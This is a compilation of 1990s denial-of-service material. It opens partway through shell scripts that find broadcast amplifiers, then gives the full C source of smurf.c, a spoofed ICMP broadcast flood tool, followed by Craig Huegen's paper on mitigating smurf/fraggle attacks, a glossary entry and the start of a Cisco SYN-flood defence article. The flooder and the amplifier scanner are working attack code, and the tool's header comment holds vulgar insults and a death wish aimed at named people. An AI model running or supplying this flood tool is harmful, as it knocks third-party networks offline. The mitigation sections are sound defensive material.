rm -f $1.ips $1.tmp
chmod 700 $1.ping
./$1.ping
rm $1.ping
fi

--- chekdup.sh ---

#!/bin/bash
# this checks possible broadcast ip's for a given amount of icmp echo
# replies.

ping -c 2 $1 > $1.out
if
cat $1.out | grep dupl > /dev/null
then
export DUPES="`cat $1.out | grep dupl | cut -d'+' -f2 | cut -d' ' -f1`"
else
export DUPES=1
fi
if [ $DUPES -gt 30 ]; then
echo "$1 had $DUPES dupes" >> bips.results
rm -f $1.out
else
rm -f $1.out
fi

------------------------------------------------------------------------------

Here is Tfreaks code ported to FreeBSD and whatever other
operating systems use BSD style sockets.

---- smurf.c ----

/*
* $Id smurf.c,v 5.0 1997/10/13 22:37:21 CDT griffin Exp $
*
* spoofs icmp packets from a host to various broadcast addresses resulting in
* multiple replies to that host from a single packet.
*
* orginial linux code by tfreak, most props to him, all I did was port it to
* operating systems with a less perverse networking system, such as FreeBSD,
* and many others. -Griffin
*
* mad head to: nyt, soldier, autopsy, legendnet, #c0de, irq for being my guinea
* pig, MissSatan for swallowing, napster for pimping my sister, the guy that
* invented vaseline, fyber for trying, knowy, old school #havok, kain cos he
* rox my sox, zuez, toxik, robocod, and everyone else that i might have
* missed (you know who you are).
*
* hi to pbug, majikal, white_dragon and chris@unix.org for being the sexy thing
* he is (he's -almost- as stubborn as me, still i managed to pick up half
* the cheque).
*
* and a special hi to Todd, face it dude, you're fucking awesome.
*
* mad anal to: #madcrew/#conflict for not cashing in their cluepons, EFnet
* IRCOps because they plain suck, Rolex for being a twit, everyone that
* trades warez, Caren for being a lesbian hoe, AcidKill for being her
* partner, #cha0s, sedriss for having an ego in inverse proportion to his
* penis and anyone that can't pee standing up -- you don't know what your
* missing out on.
*
* and anyone thats ripped my code (diff smurf.c axcast.c is rather
* interesting).
*
* and a HUGE TWICE THE SIZE OF SOLDIER'S FUCK TO AMM FUCK YOU to Bill Robbins
* for trying to steal my girlfriend. Not only did you show me no respect
* but you're a manipulating prick who tried to take away the most important
* thing in the world to me with no guilt whatsoever, and for that I wish you
* nothing but pain. Die.
*
* disclaimer: I cannot and will not be held responsible nor legally bound for
* the malicious activities of individuals who come into possession of this
* program and I refuse to provide help or support of any kind and do NOT
* condone use of this program to deny service to anyone or any machine. This
* is for educational use only. Please Don't abuse this.
*
* Well, i really, really, hate this code, but yet here I am creating another
* disgusting version of it. Odd, indeed. So why did I write it? Well, I,
* like most programmers don't like seeing bugs in their code. I saw a few
* things that should have been done better or needed fixing so I fixed them.
* -shrug-, programming for me as always seemed to take the pain away ...
*
*
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

void banner(void);
void usage(char *);
void smurf(int, struct sockaddr_in, u_long, int);
void ctrlc(int);
unsigned int host2ip(char *hostname);
unsigned short in_chksum(u_short *, int);

unsigned int
host2ip(char *hostname)
{
static struct in_addr i;
struct hostent *h;
i.s_addr = inet_addr(hostname);
if (i.s_addr == -1) {
h = gethostbyname(hostname);
if (h == NULL) {
fprintf(stderr, "can't find %s\n.", hostname);
exit(0);
}
bcopy(h->h_addr, (char *) &i.s_addr, h->h_length);
}
return i.s_addr;
}

/* stamp */
char id[] = "$Id smurf.c,v 5.0 1997/10/13 22:37:21 CDT griffin Exp $";

int
main(int argc, char *argv[])
{
struct sockaddr_in sin;
FILE *bcastfile;
int i, sock, bcast, delay, num, pktsize, cycle = 0,
x;
char buf[32], **bcastaddr = malloc(8192);

banner();
signal(SIGINT, ctrlc);

if (argc < 6)
usage(argv[0]);

sin.sin_addr.s_addr = host2ip(argv[1]);
sin.sin_family = AF_INET;

num = atoi(argv[3]);
delay = atoi(argv[4]);
pktsize = atoi(argv[5]);

if ((bcastfile = fopen(argv[2], "r")) == NULL) {
perror("opening bcast file");
exit(-1);
}
x = 0;
while (!feof(bcastfile)) {
fgets(buf, 32, bcastfile);
if (buf[0] == '#' || buf[0] == '\n' || !isdigit(buf[0]))
continue;
for (i = 0; i < strlen(buf); i++)
if (buf[i] == '\n')
buf[i] = '\0';
bcastaddr[x] = malloc(32);
strcpy(bcastaddr[x], buf);
x++;
}
bcastaddr[x] = 0x0;
fclose(bcastfile);

if (x == 0) {
fprintf(stderr, "ERROR: no broadcasts found in file %s\n\n", argv[2]);
exit(-1);
}
if (pktsize > 1024) {
fprintf(stderr, "ERROR: packet size must be < 1024\n\n");
exit(-1);
}
if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("getting socket");
exit(-1);
}
setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char *) &bcast, sizeof(bcast));

printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]);

for (i = 0; i < num || !num; i++) {
if (!(i % 25)) {
printf(".");
fflush(stdout);
}
smurf(sock, sin, inet_addr(bcastaddr[cycle]), pktsize);
cycle++;
if (bcastaddr[cycle] == 0x0)
cycle = 0;
usleep(delay);
}
puts("\n\n");
return 0;
}

void
banner(void)
{
puts("\nsmurf.c v5.0 by TFreak, ported by Griffin\n");
}

void
usage(char *prog)
{
fprintf(stderr, "usage: %s "
" \n\n"
"target = address to hit\n"
"bcast file = file to read broadcast addresses from\n"
"num packets = number of packets to send (0 = flood)\n"
"packet delay = wait between each packet (in ms)\n"
"packet size = size of packet (< 1024)\n\n", prog);
exit(-1);
}

void
smurf(int sock, struct sockaddr_in sin, u_long dest, int psize)
{
struct ip *ip;
struct icmp *icmp;
char *packet;
int hincl = 1;

packet = malloc(sizeof(struct ip) + sizeof(struct icmp) + psize);
ip = (struct ip *) packet;
icmp = (struct icmp *) (packet + sizeof(struct ip));

memset(packet, 0, sizeof(struct ip) + sizeof(struct icmp) + psize);
setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &hincl, sizeof(hincl));
ip->ip_len = sizeof(struct ip) + sizeof(struct icmp) + psize;
ip->ip_hl = sizeof *ip >> 2;
ip->ip_v = 4;
ip->ip_ttl = 255;
ip->ip_tos = 0;
ip->ip_off = 0;
ip->ip_id = htons(getpid());
ip->ip_p = 1;
ip->ip_src.s_addr = sin.sin_addr.s_addr;
ip->ip_dst.s_addr = dest;
ip->ip_sum = 0;
icmp->icmp_type = 8;
icmp->icmp_code = 0;
icmp->icmp_cksum = htons(~(ICMP_ECHO << 8));

sendto(sock, packet, sizeof(struct ip) + sizeof(struct icmp) + psize,
0, (struct sockaddr *) & sin, sizeof(struct sockaddr));

free(packet); /* free willy! */
}

void
ctrlc(int ignored)
{
puts("\nDone!\n");
exit(1);
}

unsigned short
in_chksum(u_short * addr, int len)
{
register int nleft = len;
register int sum = 0;
u_short answer = 0;

while (nleft > 1) {
sum += *addr++;
nleft -= 2;
}

if (nleft == 1) {
*(u_char *) (&answer) = *(u_char *) addr;
sum += answer;
}
sum = (sum >> 16) + (sum + 0xffff);
sum += (sum >> 16);
answer = ~sum;
return (answer);
}

--- end ---

THE LATEST IN DENIAL OF SERVICE ATTACKS: "SMURFING"
DESCRIPTION AND INFORMATION TO MINIMIZE EFFECTS

Craig A. Huegen
chuegen@pentics.com

Last Update: Tue Feb 8 17:47:36 PST 2000

New additions:

* Removed "smurf update" section -- no longer valid given distributed DoS

Editor's plea: *please* distribute this information freely, and abide by
my redistribution requirements (see the very end) when doing so. It's
important that these attacks be minimized, and communication is the only
way to help with this.

OVERVIEW:

The information here provides in-depth information regarding "smurf" and
"fraggle" attacks, with a focus on Cisco routers and how to reduce the
effects of the attack. Some information is general and not related to an
organization's particular vendor of choice; however, it is written with a
Cisco router focus. No confirmation has been made to the effects on other
vendors' equipment; however, others have provided me with information for
various vendors, which is provided in the document. See the
"Acknowledgements" section below for the sources and contact information.
I am happy to accept information from other colleagues or other vendors
who are willing to provide information about other vendors' products in
relation to this topic.

This paper is always being updated as I receive more information about
attacks and work with ways to minimize impact.

DESCRIPTION:

The "smurf" attack, named after its exploit program, is one of the most
recent in the category of network-level attacks against hosts. A
perpetrator sends a large amount of ICMP echo (ping) traffic at IP broadcast
addresses, all of it having a spoofed source address of a victim. If the
routing device delivering traffic to those broadcast addresses performs
the IP broadcast to layer 2 broadcast function noted below, most hosts on
that IP network will take the ICMP echo request and reply to it with an
echo reply each, multiplying the traffic by the number of hosts
responding. On a multi-access broadcast network, there could potentially
be hundreds of machines to reply to each packet.

The "smurf" attack's cousin is called "fraggle", which uses UDP echo
packets in the same fashion as the ICMP echo packets; it was a simple
re-write of "smurf".

Currently, the providers/machines most commonly hit are IRC servers and
their providers.

There are two parties who are hurt by this attack... the intermediary
(broadcast) devices--let's call them "amplifiers", and the spoofed address
target, or the "victim". The victim is the target of a large amount of
traffic that the amplifiers generate.

Let's look at the scenario to paint a picture of the dangerous nature of
this attack. Assume a co-location switched network with 100 hosts, and
that the attacker has a T1. The attacker sends, say, a 768kb/s stream of
ICMP echo (ping) packets, with a spoofed source address of the victim, to
the broadcast address of the "bounce site". These ping packets hit the
bounce site's broadcast network of 100 hosts; each of them takes the packet
and responds to it, creating 100 ping replies out-bound. If you multiply
the bandwidth, you'll see that 76.8 Mbps is used outbound from the "bounce
site" after the traffic is multiplied. This is then sent to the victim (the
spoofed source of the originating packets).

HOW TO DETERMINE IF YOUR NETWORK IS VULNERABLE:

Several sites have been established to do both active and passive scanning
of networks to determine whether or not directed-broadcast is enabled.

http://www.netscan.org/ is a site which actively scans the IPv4 address
space and mails network contacts with information on how to disable them.

http://www.powertech.no/smurf/ is a site which will test scan your
network and allow you to enter a known smurf amplifier site.

HOW TO KEEP YOUR SITE FROM BEING THE SOURCE
PERPETRATORS USE TO ATTACK VICTIMS:

The perpetrators of these attacks rely on the ability to source spoofed
packets to the "amplifiers" in order to generate the traffic which causes
the denial of service.

In order to stop this, all networks should perform filtering either at the
edge of the network where customers connect (access layer) or at the edge
of the network with connections to the upstream providers, in order to
defeat the possibility of source-address-spoofed packets from entering
from downstream networks, or leaving for upstream networks.

Paul Ferguson of cisco Systems and Daniel Senie of BlazeNet have written
an RFC pertaining to this topic. See:

ftp://ftp.isi.edu/in-notes/rfc2267.txt

for more information and examples on this subject.

Additionally, router vendors have added or are currently adding options
to turn off the ability to spoof IP source addresses by checking the
source address of a packet against the routing table to ensure the return
path of the packet is through the interface it was received on.

Cisco has added this feature to the current 11.1CC branch, used by many
NSP's, in an interface command '[no] ip verify unicast reverse-path'.

See the "other vendors" section for 3Com information regarding this feature.

HOW TO STOP BEING AN INTERMEDIARY:

This attack relies on the router serving a large multi-access broadcast
network to frame an IP broadcast address (such as 10.255.255.255) into a
layer 2 broadcast frame (for Ethernet, FF:FF:FF:FF:FF:FF). RFC 1812,
"Requirements for IP Version 4 Routers", Section 5.3.5, specifies:

---
A router MAY have an option to disable receiving network-prefix-
directed broadcasts on an interface and MUST have an option to
disable forwarding network-prefix-directed broadcasts. These options
MUST default to permit receiving and forwarding network-prefix-
directed broadcasts.
---

Generally, with IP providers and IP applications as we know them today,
this behavior should not be needed, and it is recommended that
directed-broadcasts be turned off, to suppress the effects of this attack.

RFC 2644, a Best Current Practice RFC by Daniel Senie, updates RFC 1812
to state that router software must default to denying the forwarding
and receipt of directed broadcasts.

Ethernet NIC hardware (MAC-layer hardware, specifically) will only listen
to a select number of addresses in normal operation. The one MAC address
that all devices share in common in normal operation is the media
broadcast, or FF:FF:FF:FF:FF:FF. If a device receives a packet destined
to the broadcast link-layer address, it will take the packet and send an
interrupt for processing by the higher-layer routines.

To stop your Cisco router from converting these layer 3 broadcasts into
layer 2 broadcasts, use the "no ip directed-broadcast" interface
configuration command. This should be configured on each interface of all
routers.

As of Cisco IOS version 12.0, "no ip directed-broadcast" is now the default
in order to protect networks by default. "ip directed-broadcast" will be
needed if your network requires directed broadcasts to be enabled.

Other vendor information:

* Proteon/OpenROUTE:
Daniel Senie (dts@senie.com) reports that Proteon/OpenROUTE Networks
routers have an option to turn off directed broadcasts in the IP
Configuration menus. The command sequence to turn them off is:
*CONFIG (on newer routers) or TALK 6 (on older routers)
Config>PROTOCOL IP
IP Config>DISABLE DIRECTED-BROADCAST
A restart of the router is then required.
* Nortel Networks (Bay Networks):
Jon Green (jcgreen@netins.net) reports that bugID CR33408 added the
ability to disable network-directed broadcasts beginning in version
12.01 rev 1 of BayRS code.
To disable, enter:
[1:1]$bcc
bcc> config
hostname# ip
ip# set directed-bcast disabled
ip# exit
Note that this will bounce all IP interfaces.
Greg Hankins (ghankins@mindspring.net) reports that in BayRS 13.01
and later, directed-broadcast is disabled by default.
Tim Winders (twinders@SPC.cc.tx.us) mentions that if you upgrade
to BayRS 13.01+ from 12.01, directed-broadcasts are not disabled.
* 3Com NETBuilder products:
Mike Kouri (Mike_Kouri@3com.com) reports that all 3Com NETBuilders have
an option to keep the router from forwarding the directed broadcasts.
The command sequence to disable the forwarding is:
SETDefault -IP CONTrol = NoFwdSubnetBcast
Additionally, 3Com NETBuilder products running version 9.1 or later can
be configured to discard source-spoofed packets:
SETDefault !port -FireWall CONTrol = (Filter, DenySrcSpoofing)
3Com states in the web page (listed below) that this command
"Specifies whether packets are subject to source-spoofing checks. This is a
CPU-intensive option and generally results in performance degradation. You
should disable this option except on interfaces where external, untrusted
traffic is received. The source address of incoming packets is checked
against the routing table. If the routing information shows that the
source address is unreachable, or reachable on different interfaces,
then it is a SrcSpoofing attack."
* Lucent (Ascend):
Will Pierce (willp@dreamscape.com) reports that on Maxes or Pipelines
running TAOS 6.0.0 or higher, you can go to the Ethernet->Mod Config menu
and set both "Reply DirectedBcast Ping" and "Forward Directed Bcast" to
"No". For the Max TNT, there is an example at
ftp://ftp.ascend.com/pub/Software-Releases/MaxTNT/Release-2.0.X/2.0.0/doc/tnt20.pdf
on page 40. TNT versions 2.0.0 and higher support this.
* Cabletron SmartSwitch Router (Yago/SSR):
Greg Hankins (ghankins@mindspring.net) reports directed-broadcast is
disabled by default, and can be enabled by entering the global command
"ip enable directed-broadcast".
* Foundry Networks:
Greg Hankins (ghankins@mindspring.net) reports that hardware running
Foundry's routing software can be configured to disable
directed-broadcasts with the global or per-interface "no ip
directed-broadcast" command.
* Redback Networks:
Justin Streiner (streiner@stargate.net) reports that on the SMS-500
and SMS-1000 access switches, there is no support for directed
broadcasts unless used in conjunction with DHCP, and they are not
forwarded by default.
* Extreme Networks:
Aurobindo Sundaram (sundaram@austin.apc.slb.com) reports that you
can disable IP broadcast forwarding on Extreme's Summit 1 switches
by using the following commands:
disable ipforwarding broadcast all
disable ipforwarding broadcast vlan vlan-name
* ArrowPoint Communications:
Greg Hankins (ghankins@mindspring.net) reports that directed-broadcasts
can be disabled by using the "no ip subnet-broadcast" global
configuration command.
* SGI IRIX as a router:
Mike O'Connor (mjo@dojo.mi.org) reports that IRIX has been configured
by default to not forward the directed-broadcasts when used as a router.
The tunable for this is in /var/sysgen/master.d/bsd.

There is one case study where this will stop intended behavior: In the
case where samba (an SMB server for UNIX) or NT is used to "remote
broadcast" into a LAN workgroup so that the workstations on that LAN can
see the server, this will prevent the LAN machines from seeing the remote
server. This is *only* in the case where there is no WINS server (WINS is
routed unicast) and a "remote broadcast" is being used--it's a rare but
notable condition.

(Editor's note: I welcome any comments as to what else breaks without
the support for directed-broadcast.)

Additionally, hosts can be patched to refuse to respond to broadcasted
ICMP echo packets. RFC 1122, "Requirements for Internet Hosts --
Communications Layer", Section 3.2.2.6, states:

---
An ICMP Echo Request destined to an IP broadcast or IP
multicast address MAY be silently discarded.

DISCUSSION:
This neutral provision results from a passionate debate
between those who feel that ICMP Echo to a broadcast
address provides a valuable diagnostic capability and
those who feel that misuse of this feature can too
easily create packet storms.
---

Because of this, most IP stack implementors have chosen to implement the
default support provision, which is to reply to an ICMP Echo Request.
As mentioned in the paragraph from the RFC (above), it is perfectly legal
for a host to silently discard ICMP echos. Several patches have been
found floating about in mailing lists for disabling response to broadcast
ICMP echos for the freely-available UNIX systems.

In the case of the smurf or fraggle attack, each host which supports this
behavior on a broadcast LAN will happily reply with an ICMP or UDP (smurf
or fraggle, respectively) echo-reply packet toward the spoofed source
address, the victim.

The following section contains information to configure hosts *not* to
respond to ICMP echo requests to broadcast addresses.

IBM has provided a setting in AIX 4.x to disable responses to broadcast
addresses. It is not available in AIX 3.x. Use the "no" command to turn
it off or on. NOTE: On AIX 4.x responses are DISABLED by default.
no -o bcastping=0 # disable bcast ping responses (default)

Solaris can be set not to respond to ICMP echo requests. Add the
following line to your /etc/rc2.d/S69inet startup:
ndd -set /dev/ip ip_respond_to_echo_broadcast 0
If you're using Solaris as a router, you can configure it not to
forward directed broadcasts by placing the following line in
your /etc/rc2.d/S69inet startup:
ndd -set /dev/ip ip_forward_directed_broadcasts 0

Starting with version 2.2.5, FreeBSD's IP stack does not respond to icmp
echo requests destined to broadcast and multicast addresses by default.
The sysctl parameter for this functionality is net.inet.icmp.bmcastecho.
Beginning with version 3.x, FreeBSD makes this option configurable in
the /etc/rc.conf file with an option under the miscellaneous network
configuration section.

Under NetBSD, directed broadcasts can be disabled by using the sysctl
command:
sysctl -w net.inet.ip.directed-broadcast=0

Under Linux, one can use the CONFIG_IP_IGNORE_ECHO_REQUESTS variable to
completely ignore ICMP echo requests. Of course, this violates RFC 1122.
"ipfw" can be used from Linux to block broadcast echos, a la:

Any system with ipfw can be protected by adding rules such as:
ipfwadm -I -a deny -P icmp -D 123.123.123.0 -S 0/0 0 8
ipfwadm -I -a deny -P icmp -D 123.123.123.255 -S 0/0 0 8
(replace 123.123.123.0 and 123.123.123.255 with your base network number
and broadcast address, respectively)

To protect a host against "fraggle" attacks on most UNIX machines, one
should comment the lines which begin with "echo" and "chargen" in
/etc/inetd.conf and restart inetd.

INFORMATION FOR VICTIMS AND HOW TO SUPPRESS ATTACKS:

The amount of bandwidth and packets per second (pps) that can be generated
by this attack is quite large. With a 200-host LAN, I was able to
generate over 80 Mbps traffic at around 35 Kpps toward my target--a
pretty significant amount. The victims receive this because traffic is
multiplied by the number of hosts on the broadcast network used (in this
case, with a 200-host network, I was only required to send 400 Kbps
to the broadcast address--less than one-third of a T1).

Many hosts cannot process this many packets per second; many hosts are
connected to 10 Mbps Ethernet LANs where more traffic than wire speed
is sent. Therefore, the ability to drop these packets at the network
border, or even before it flows down the ingress pipes, is desired.

Cisco routers have several "paths" which packets can take to be routed;
each has a varying degree of overhead. The slowest of these is "process"
switching. This is used when a complex task is required for processing
packets. The other modes are variations of a fast path--each of them with
a set of advantages and disadvantages. However, they're all handled at
interrupt level (no process-level time is required to push these packets).

In IOS versions (even the most recent), access-list denies are handled at
the process (slow) level, because they require an ICMP unreachable to be
generated to the originating host. All packets were sent to the process
level automatically to be handled this way.

Under a recent code change (Cisco bug ID CSCdj35407--integrated in version
11.1(14)CA and later 11.1CA, 11.1CC, 11.1CE, and 12.0 trains), packets
denied by an access-list will be dropped at the interrupt (fast) level, with
the exception of 2 packets per second per access-list deny line. These 2
packets per second will be used to send the "ICMP unreachable via
administrative block" messages. This assumes that you don't want to log
the access-list violations (via the "log" or "log-input" keywords). The
ability to rate-limit "log-input" access-list lines (in order to more
easily log these packets) is currently being integrated; see the section
below on tracing spoofed packet attacks for information on logging.

Filtering ICMP echo reply packets destined for your high-profile machines
at the ingress interfaces of the network border routers will then permit
the packets to be dropped at the earliest possible point. However, it
does not mean that the network access pipes won't fill, as the packets
will still come down the pipe to be dropped at the router. It will,
however, take the load off the system being attacked. Keep in mind that
this also denies others from being able to ping from that machine (the
replies will never reach the machine).

For those customers of providers who use Cisco, this may give you some
leverage with the providers' security teams to help save your pipes by
filtering before the traffic is sent to you.

An additional technology you can use to protect your machines is to use
committed access rate, or CAR. CAR is a functionality that works
with Cisco Express Forwarding, found in 11.1CC, 11.1CE, and 12.0. It
allows network operators to limit certain types of traffic to specific
sources and/or destinations.

For example, a provider has filtered its IRC server from receiving
ICMP echo-reply packets in order to protect it, but many attackers are
now attacking other customer machines or network devices in order to
fill some network segments.

The provider above chose to use CAR in order to limit all ICMP echo
and echo-reply traffic received at the borders to 256 Kbps. An example
follows:

! traffic we want to limit
access-list 102 permit icmp any any echo
access-list 102 permit icmp any any echo-reply
! interface configurations for borders
interface Serial3/0/0
rate-limit input access-group 102 256000 8000 8000 conform-action transmit exceed-action drop

This limits ICMP echo and echo-reply traffic to 256 Kbps with a small
amount of burst. Multiple "rate-limit" commands can be added to an
interface in order to control other kinds of traffic as well.

The command "show interface [interface-name] rate-limit" will show the
statistics for rate-limiting; "clear counters [interface-name]" will
clear the statistics for a fresh look.

CAR can also be used to limit TCP SYN floods to particular hosts --
without impeding existing connections. Some attackers have started
using very high streams of TCP SYN packets in order to harm systems
once again.

Here is an example which limits TCP SYN packets directed at host
10.0.0.1 to 8 kbps or so:

! We don't want to limit established TCP sessions -- non-SYN packets
access-list 103 deny tcp any host 10.0.0.1 established
! We do want to limit the rest of TCP (this really only includes SYNs)
access-list 103 permit tcp any host 10.0.0.1
! interface configurations for network borders
interface Serial3/0/0
rate-limit input access-group 103 8000 8000 8000 conform-action transmit exceed-action drop

Currently, CAR is only available for 7200 and 7500 series routers.
Additional platform support is planned in 12.0.

Additionally, CAR can be used to set IP precedence; this is beyond
the scope of this paper. Consult www.cisco.com for more information
on the uses of CAR.

TRACING SPOOFED PACKET STREAMS:

Tracking these attacks can prove to be difficult, but is possible with
coordination and cooperation from providers. This section also assumes
Cisco routers, because I can speak only about the abilities of Cisco to
log/filter packets and what impact it may have.

Today, logging packets which pass through or get dropped in an ACL is
possible; however, all packets with the "log" or "log-input" ACL options
are sent to process level for logging. For a large stream of packets,
this could cause excessive CPU problems. For this reason, tracking
attacks via IOS logging today is limited to either lower bandwidth attacks
(smaller than 10k packets per second). Even then, the number of log
messages generated by the router could overload a syslog server.

Cisco bug ID CSCdj35856 addresses this problem. It has been integrated
into IOS version 11.1CA releases beginning with 11.1(14.1)CA (a
maintenance interim release), and makes it possible to log packets at
defined intervals and to process logged packets not at that interval in
the fast path. I will update this page with version numbers as the
releases are integrated.

Some information on logging:

In later 11.1 versions, a new keyword was introduced for ACL logging:
"log-input". A formatted ACL line utilizing the keyword looks like this:

access-list 101 permit icmp any any echo log-input

When applied to an interface, this line will log all ICMP ping packets
with input interface and MAC address (for multi-access networks).
Point-to-point interfaces will not have a MAC address listed.

Here's an example of the log entry for a multi-access network (FDDI, Ether):

Sep 10 23:17:01 PDT: %SEC-6-IPACCESSLOGDP: list 101 permitted icmp
10.0.7.30 (FastEthernet1/0 0060.3e2f.6e41) -> 10.30.248.3 (8/0), 5 packets

Here's an example of the log entry for a point-to-point network:

Sep 10 23:29:00 PDT: %SEC-6-IPACCESSLOGDP: list 101 permitted icmp
10.0.7.30 (BRI0 *PPP*) -> 10.0.19.242 (8/0), 1 packet

Substituting "log" for "log-input" will eliminate the incoming interface
and MAC address from the log messages.

We'll use the first log entry to demonstrate how to go from here. This
log entry means the packet came in on FastEthernet1/0, from MAC address
0060.3e2f.6e41, destined for 10.30.248.3. From here, you can use "show ip
arp" (if needed) to determine the IP address for the MAC address, and go
to the next hop for tracing or contact the necessary peer (in the case of
an exchange point). This is a hop-by-hop tracing method.

Example of "show ip arp" used to find next hop:

netlab#show ip arp 0060.3e2f.6e41
Protocol Address Age (min) Hardware Addr Type Interface
Internet 10.0.183.65 32 0060.3e2f.6e41 ARPA FastEthernet1/0

As you can see, 10.0.183.65 is the next hop where the packets came from
and we should go there to continue the tracing process, utilizing the same
ACL method. By doing this, you can track the spoof attack backwards.

While this is general information on tracking spoofed packets, it must be
noted that the victims of a smurf/fraggle attack get packets from the listed
source in the packets; i.e., they receive echo-reply packets truly from the
source listed in the IP header. This information should be used by the
amplifiers or intermediaries to track the spoofed echo _request_ packets
back to their source (the perpetrator).

OTHER DENIAL OF SERVICE ATTACKS WORTHY OF MENTION:

Two other denial of service attacks frequently encountered are TCP SYN
floods, and UDP floods aimed at diagnostic ports on hosts.

TCP SYN attacks consist of a large number of spoofed TCP connection set-up
messages aimed at a particular service on a host. Older TCP
implementations cannot handle many faked connection set-up packets, and
will not allow access to the victim service.

The most common form of UDP flooding directed at harming networks is an
attack consisting of a large number of spoofed UDP packets aimed at
diagnostic ports on network devices. This attack is also known as the
"pepsi" attack (again named after the exploit program), and can cause
network devices to use up a large amount of CPU time responding to these
packets.

To get more information on minimizing the effects of these two attacks,
see:

Defining Strategies to Protect Against TCP SYN
Denial of Service Attacks
http://cio.cisco.com/warp/public/707/4.html

Defining Strategies to Protect Against UDP Diagnostic
Port DoS Attacks
http://cio.cisco.com/warp/public/707/3.html

PERFORMANCE INFORMATION:

One ISP has reported that, spread across three routers (2 RSP2 and 1
RSP4), the fast drop code eliminated a sustained 120 Mbps smurf
attack and kept the network running without performance problems.

As always, your mileage may vary.

ACKNOWLEDGEMENTS:

Thanks to all those who helped review and provide input to the paper, as
well as sanity checking.

Referenced documents:

RFC-1122, "Requirements for Internet Hosts - Communication Layers";
R.T. Braden; October 1989.

RFC-1812, "Requirements for IP Version 4 Routers"; F. Baker; June 1995.

RFC-2267, "Network Ingress Filtering: Defeating Denial of Service Attacks
which employ IP Source Address Spoofing"; P. Ferguson, D. Senie;
January 1998.

RFC-2644, "Changing the Default for Directed Broadcasts in Routers";
D. Senie; August 1999.

Defining Strategies to Protect Against TCP SYN
Denial of Service Attacks
http://cio.cisco.com/warp/public/707/4.html

Defining Strategies to Protect Against UDP Diagnostic
Port DoS Attacks
http://cio.cisco.com/warp/public/707/3.html

Cisco command documention to turn off directed broadcasts
http://www.cisco.com/univercd/cc/td/doc/product/software/ios113ed/cs/csprtn1/csipadr.htm#xtocid748113

3Com command documentation to turn off directed broadcasts
http://infodeli.3com.com/infodeli/tools/bridrout/u_guides/html/nb101/family/REF/ip4.htm#190

3Com command documentation to disable source spoofing
http://infodeli.3com.com/infodeli/tools/bridrout/u_guides/html/nb101/family/REF/firewal3.htm#1823

PERMISSION TO DUPLICATE:

Permission to duplicate this information is granted under these terms:

1. My name and e-mail address remains on the information as a target for
questions and identification of the source
2. My disclaimer appears on the information at the bottom
3. Feel free to add extra information from other discussions, etc., but
please ensure the correct attribution is made to the author. Also
provide Craig Huegen (chuegen@pentics.com) a copy of your additions.
4. Please help disseminate this information to other network
administrators who are affected by these attacks.

If you have questions, I will be happy to answer them to the best of my
knowledge.

MY DISCLAIMER:

I'm speaking about this as an interested party only. All text in this
paper was written by me; I speak/write for no one but myself. No vendors
have officially confirmed/denied any of the information contained herein.
All research for this paper is being done purely as a matter of
self-interest and desire to help others minimize effects of this attack.

Craig A. Huegen
chuegen@pentics.com
http://www.quadrunner.com/denial-of-service/white-papers/smurf.txt

smurfing

DEFINITION - Smurfing is the attacking of a network by exploiting Internet Protocol (IP) broadcast addressing and certain other aspects of Internet operation. Smurfing uses a program called Smurf and similar programs to cause the attacked part of a network to become inoperable. The exploit of smurfing, as it has come to be known, takes advantage of certain known characteristics of the Internet Protocol (IP) and the Internet Control Message Protocol (ICMP). The ICMP is used by network nodes and their administrators to exchange information about the state of the network. ICMP can be used to ping other nodes to see if they are operational. An operational node returns an echo message in response to a ping message.

A smurf program builds a network packet that appears to originate from another address (this is known as spoofing an IP address). The packet contains an ICMP ping message that is addressed to an IP broadcast address, meaning all IP addresses in a given network. The echo responses to the ping message are sent back to the "victim" address. Enough pings and resultant echoes can flood the network making it unusable for real traffic.

One way to defeat smurfing is to disable IP broadcast addressing at each network router since it is seldom used. This is one of several suggestions provided by the CERT Coordination Center.

CONTRIBUTORS: Jeannine Broadwell
LAST UPDATED: 20 Apr 2005

Defining Strategies to Protect Against TCP SYN Denial of Service Attacks
Document ID: 14760
Contents

Abstract
Prerequisites
Requirements
Components Used
Conventions
Problem Description
The TCP SYN Attack
Defending Against Attacks on Network Devices
Devices Behind Firewalls
Devices Offering Publicly Available Services (Mail Servers, Public Web Servers)
Preventing A Network from Unwittingly Hosting an Attack
Preventing Transmission of Invalid IP Addresses
Preventing Reception of Invalid IP Addresses
Related Information

Abstract

There is a potential denial of service attack at internet service providers (ISPs) that targets network devices.

*

TCP SYN attack: A sender transmits a volume of connections that cannot be completed. This causes the connection queues to fill up, thereby denying service to legitimate TCP users.

This paper contains a technical description of how the potential TCP SYN attack occurs and suggested methods for using Cisco IOS software to defend against it.

Note: Cisco IOS 11.3 software has a feature to actively prevent TCP denial of service attacks. This feature is described in the document Configuring TCP Intercept (Prevent Denial-of-Service Attacks).
Prerequisites
Requirements

There are no specific prerequisites for this document.
Components Used

This document is not restricted to specific software and hardware versions.

The information presented in this document was created from devices in a specific lab environment. All of the devices used in this document started with a cleared (default) configuration. If you are working in a live network, ensure that you understand the potential impact of any command before using it.
Conventions

For more information on document conventions, see the Cisco Technical Tips Conventions.
Problem Description
The TCP SYN Attack

When a normal TCP connection starts, a destination host receives a SYN (synchronize/start) packet from a source host and sends back a SYN ACK (synchronize acknowledge). The destination host must then hear an ACK (acknowledge) of the SYN ACK before the connection is established. This is referred to as the "TCP three-way handshake."

While waiting for the ACK to the SYN ACK, a connection queue of finite size on the destination host keeps track of connections waiting to be completed. This queue typically empties quickly since the ACK is expected to arrive a few milliseconds after the SYN ACK.

The TCP SYN attack exploits this design by having an attacking source host generate TCP SYN packets with random source addresses toward a victim host. The victim destination host sends a SYN ACK back to the random source address and adds an entry to the connection queue. Since the SYN ACK is destined for an incorrect or non-existent host, the last part of the "three-way handshake" is never completed and the entry remains in the connection queue until a timer expires, typically for about one minute. By generating phony TCP SYN packets from random IP addresses at a rapid rate, it is possible to fill up the connection queue and deny TCP services (such as e-mail, file transfer, or WWW) to legitimate users.

There is no easy way to trace the originator of the attack because the IP address of the source is forged.

The external manifestations of the problem include inability to get e-mail, inability to accept connections to WWW or FTP services, or a large number of TCP connections on your host in the state SYN_RCVD.
Defending Against Attacks on Network Devices
Devices Behind Firewalls

